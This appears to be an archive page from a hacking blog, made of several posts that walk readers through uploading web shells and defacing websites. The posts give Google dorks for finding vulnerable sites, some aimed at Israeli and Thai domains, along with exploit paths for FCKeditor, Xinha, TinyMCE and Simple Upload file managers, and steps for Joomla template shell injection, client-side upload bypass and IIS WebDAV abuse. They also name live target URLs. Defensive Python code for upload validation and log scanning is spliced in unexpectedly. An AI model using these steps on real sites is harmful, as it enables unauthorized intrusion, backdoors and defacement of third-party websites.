Showing posts with label Vulnerability. Show all posts

Monday, 20 June 2016

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey guys. Today I found some fresh private Israel 0day exploits, so I thought of sharing them with you all. So let's start.
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your ASP or PHP shell, just check the source code of the page and you will see your shell URL. Example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
# Exploit -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php
3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

So that's it, guys. We have seen Israel Private 0Day Shell Upload Exploits ASP|PHP. Share it :)

How To Upload Shell in Joomla Via Admin Panel

Hello Guys! Successfully hacked into a Joomla admin panel? Not sure how to upload a shell in Joomla via the admin panel? Well, you are at the right place, because today I'm going to teach you How To Upload Shell in Joomla Via Admin Panel. It's pretty simple! Just follow the steps given below :)

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How To Upload Shell in Joomla Via Admin Panel:

Suppose we have access to the Joomla admin. Now just log in to it.



Once you log in, you see the screen below.



Then look for Extensions and in that Template Manager.



Once you click on that you will see all the templates installed on that site.



See the marking in red: it has the star. It means it's the default template currently used by the site. Select any of the templates, as I did with beez, marked in green.



Once you click on beez you will see the following screen. Now just click on Edit HTML.



Once you click on Edit HTML you will see the following screen.



See the red part, /templates/beez/index.php: that is the path of your shell.

Now just paste your shell code over there and save it.




Once you click on Save, it will take you to a page where it will show you "Template source saved". Your work is done.

Once that is done you can access your shell. Path of the shell would be

www.site.com/templates/beez/index.php


Thursday, 22 January 2015

Chiangraientersoft HTML Injection Vulnerability





Hello Readers! Today I'm gonna share an HTML Injection Vulnerability. This works mostly on Thailand web pages :). So let's start.

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title
2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :
 /webboard/Qform.php
 /board/Qform.php
3). Just fill-up the forum and upload your deface page shell etc..
After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/



Saturday, 19 July 2014

Bypass Disabled Upload Option And Upload Shell

Hello Readers! Since I got many messages from people saying that they were facing many problems with shell uploading, I have decided to write about this. It's just an example of shell uploading.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Find a vulnerable sites that has Disable Upload Option. Example
http://centralplaza.co.th/chiangrai/photoupload.asp
You can also use google dork for finding more:-
inurl:/photoupload.asp



2). Now right click on the page, click on Inspect Element and find the code for that upload button, to enable the disabled upload button :P


3). Now Change the text disabled="disabled" to enabled="enabled" and press Enter..
Do the same for SUBMIT button and finally upload your shell.php.jpg ..

4). Now to find your uploaded shell, simply click on View All Photos and get your shell :)



Enjoy..!!

Thursday, 19 June 2014

WHMCS Auto 0day Exploiter 5.2.8 by g00n Team Xploiters

Hello Readers! Today I'm going to share a wonderful tool made by g00n Team Xploiters. It's WHMCS Auto 0day Exploiter 5.2.8 by g00n Team Xploiters [PHP] ...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

So Here It Is:-

Here is the PHP code of this WHMCS Auto Exploiter (0day) 5.2.8:-

Note:- You must save it as WHMCS Auto Exploiter.php


So with this, all you have to do is crack the hashes. In some cases just Google the hash and you will get the password. Then just log in to WHMCS ...

Scanned results will be saved in a text file: WMCS-Hashes.txt

Screen Shots:-




How to Hack A Targeted Server Or A Website


Hello Readers! Today I am going to teach you how you can target a server, find a vulnerability and hack into it: How to Hack a Targeted Server or a Website, How to Inject a Shell in a Targeted Server or a Website, or How to Target a Website or Server. This is not very easy, but I will try to explain.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Get I.P. Address

The first step is to get the IP address of the website or server which you want to hack. For this we have to ping our target. To do this:
  • Go to start
  • Open CMD
  • and type :-
ping www.yourtarget.com

So, now you have the IP address of your target.

See the following Image as an Example :-


2). Search for Websites hosted on Targeted Server.

Now our second step is to search for vulnerabilities in your targeted server or website. For this, all you have to do is:
ip:[targets I.P server]

Example:- ip:74.145.128.97

Doing this will display all the websites hosted on your targeted server.

3). Search for vulnerabilities..

Now the third step is to search for vulnerabilities. For this you can use normal dorks such as .php?id= for SQL injection vulnerable websites, or you can also try any other exploit. Example:
ip:74.145.128.97 .php?id=



Now try to find an injectable hole or vulnerability and hack into the server or website. That's it :)

You can do the same if you have other bugs for Joomla and other scripts. This method might be old, but it still works like gold. I hope it helps.

Enjoy..!!

Saturday, 19 April 2014

Simple Upload 53 Shell Upload Vulnerability

This vulnerability allows a hacker to upload a shell. A web application vulnerability in the "Simple Upload 53" PHP file allows an attacker to upload backdoor shell code to your website.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Paste the below dork in the google and click search.
inurl:simple-upload-53.php
2). After you search in Google you will find many Websites containing Simple-Upload-53.php at the end of url. Now simply open any of them.



3). Now you can see the upload option in the site. Here is the vulnerability, it allows you to upload files.
You can upload Backdoor shell as ".php.jpg" or ".php.gif" etc.

4). The uploaded shell will be in this place:
http://www.site.com/files/[Your File]
After uploading the shell , You can hack/deface the site.
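The ".php.jpg" / ".php.gif" names above get through handlers that look only at the last extension, and the disabled-button post earlier on this page gets through because the only check was in the browser. As an added example (not code from Simple Upload 53 or any site named here), a server-side check that rejects a script extension anywhere in the name, checks image magic bytes, and stores the file under a generated name; the function name, exception class and extension lists are assumptions.

```python
import secrets

# Assumed policy for this sketch: image uploads only, keyed by final extension.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Components a misconfigured server may hand to an interpreter (not exhaustive).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx",
               "asa", "cer", "jsp", "cgi", "pl", "htaccess"}


class UploadRejected(ValueError):
    """Raised when an upload fails server-side validation."""


def safe_stored_name(client_name: str, data: bytes) -> str:
    """Validate an upload on the server and return the name to store it under."""
    # Drop any directory part, for both / and \ separators.
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or "\x00" in base:
        raise UploadRejected("empty or NUL-containing name")
    parts = base.lower().split(".")
    # Check every dot-separated component, so "shell.php.jpg" fails on "php".
    # Trailing dots and spaces are stripped first, as Windows would drop them.
    for part in parts[1:]:
        if part.strip(" .") in SCRIPT_EXTS:
            raise UploadRejected(f"script extension in name: {part!r}")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext not in ALLOWED:
        raise UploadRejected(f"extension not allowed: {ext!r}")
    # Magic bytes are only a sanity check; the generated name below and an
    # upload directory that never executes scripts are the real controls.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected("content does not match declared image type")
    # Never reuse the client's name: a random name removes any inner ".php".
    return secrets.token_hex(16) + ext
```

Because the check runs in the request handler, it applies whether or not the browser's upload button was enabled.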

WebTester File Upload Vulnerability



Hello Reader, hope you all are enjoying my posts. Here I'm back with a new file upload vulnerability, called WebTester File Upload Vulnerability. So let's start.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). GO to google and type the following dork..
Google Dork : inurl:go.php?testID= 
For More Results Use your Brain and create your own Dork..
Exploit :http://[target]/[path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
2). Now, upload your html , txt or jpg files



3). To find your uploaded file :-
 http://target/path/test-images/[yourfile].html
Enjoy...

Hack Web Sites Using IIS Exploit [For XP Users]


Hello Readers, I heard some of you are not getting our tutorials because you have no knowledge about web hacking and you want to learn web hacking. So today I decided to write this tutorial for no0bs.

In this tutorial we are going to learn about the IIS Web Hacking Exploit, the easiest way to hack for noobs.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

By using this exploit an attacker can upload a shell, deface the web site, delete data etc., and can do everything without logging in :D. Yeah, you heard right. I know you all are getting excited, so let's start :-

Note:- This is only for Windows XP users. For Windows 7 users, I will post soon ...

Follow the Instructions:-

1). First Of all we need to find Vulnerable site. Go to google and type the following dork:-

Dork- Intext:"Powered by IIS

Actually there is no particular dork; be creative, use your mind and create your own unique dork :)

If you are unable to find one, don't worry. See the end of the tutorial; I have posted some sites :)

2). After finding a vulnerable site, click on the Start button and open "RUN"


3). Now type the following code in "RUN"
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

4). Now a folder will open named "Web Folders"

Now right click in that folder, then "New" and then "Web Folder".


5). Now paste the URL of the vulnerable site and click Next.


6). Now it will ask you to give a name for that Web Folder. Leave it as it is and click Finish.


7). Congratulations! Now you are in the web site. If you want to upload a shell, copy your Shell.php into that folder and your shell will be uploaded to the path

Example : site.com/shell.php

Do the same to upload your deface also :D

Here are some site For Practicing ....  

Soon i will post list of Vuln. sites of IIS Exploit/....
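Windows "Web Folders" is a WebDAV client, so the copy in step 7 reaches the server as WebDAV write requests, which IIS records in its W3C logs. As an added example (not from the original post), a scan of such a log for successful WebDAV writes, with anonymous script uploads ranked first; the log lines are constructed, the function name and severity labels are assumptions, and the parser reads the #Fields: directive instead of assuming fixed columns.

```python
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".cer", ".php", ".jsp")

# Constructed sample in W3C extended log format (documentation IP ranges).
SAMPLE_LOG = """\
#Version: 1.0
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2014-04-19 10:01:02 198.51.100.7 - GET /index.html 200
2014-04-19 10:02:10 203.0.113.9 - PROPFIND / 207
2014-04-19 10:02:14 203.0.113.9 - PUT /shell.php 201
2014-04-19 10:02:20 203.0.113.9 - PUT /index.html 204
2014-04-19 10:03:00 198.51.100.7 editor PUT /news/today.html 201
2014-04-19 10:04:00 203.0.113.44 - PUT /x.txt 403
2014-04-19 10:04:05 203.0.113.9 - MKCOL /backup 201
"""


def find_webdav_writes(log_text):
    """Return (severity, client_ip, method, uri) for successful writes, worst first."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # the column layout can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        method = row.get("cs-method", "").upper()
        status = row.get("sc-status", "")
        if method not in WRITE_METHODS or not status.startswith("2"):
            continue                    # reads and refused writes are not findings
        anonymous = row.get("cs-username", "-") == "-"
        script = row.get("cs-uri-stem", "").lower().endswith(SCRIPT_EXTS)
        if anonymous and script:
            severity = "critical"       # unauthenticated script upload
        elif anonymous:
            severity = "high"           # anonymous content change, e.g. a defacement
        else:
            severity = "review"         # authenticated write: confirm it was expected
        findings.append((severity, row.get("c-ip"), method, row.get("cs-uri-stem")))
    order = {"critical": 0, "high": 1, "review": 2}
    return sorted(findings, key=lambda f: order[f[0]])
```

Any "critical" or "high" finding means the site accepts anonymous WebDAV writes; the fix is to disable WebDAV or require authentication and remove write permission for the anonymous account.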

Tuesday, 15 April 2014

Portail Dokeos deface and Shell Upload vulnerability

The Portail Dokeos vulnerability is a kind of FCK Editor remote file upload vulnerability.
With this vulnerability a hacker can upload a shell, deface page or any file to the website without the admin username and password.
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and enter the following dork
Google Dork :"Portail Dokeos 1.8.5"
2). Open any site and change the url after site.com to the Exploitable target..For Example:-

Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

3). Now change ASP into PHP, as with FCK editor, and upload your deface, shell or file. You can upload .html, .php, .jpg and .txt formats here.



To view your uploaded file go here : http://website/patch/main/upload/your file here 

Live Demo:-
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ecampus.webinfo-concept.fr/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
